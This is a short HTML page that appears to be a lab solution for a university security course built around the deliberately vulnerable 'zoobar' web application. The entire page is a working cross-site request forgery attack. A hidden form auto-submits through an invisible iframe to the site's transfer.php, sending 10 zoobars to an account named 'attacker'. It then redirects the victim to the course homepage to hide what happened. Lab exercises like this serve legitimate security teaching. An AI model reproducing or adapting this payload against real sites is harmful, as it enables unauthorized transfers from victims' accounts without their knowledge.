<!DOCTYPE html>
<html>
<script>
function redirect() {
	document.getElementById("myform_0").submit();
	window.location.replace("http://ece568.csl.toronto.edu/");
}
</script>
<body style="visibility:hidden">
	<form method="POST" id="myform_0" name="MyForm" action="http://zoobar.csl.toronto.edu/transfer.php" target="iframe">
		<input name="zb_recipient" type="text" value="attacker">
		<input name="zoobars" type="text" value="10">
		<input name="submission" type="text" value="Send">
	</form>
	<iframe style="visibility:hidden" onload="redirect()" name="iframe"></iframe>
</body>
</html>
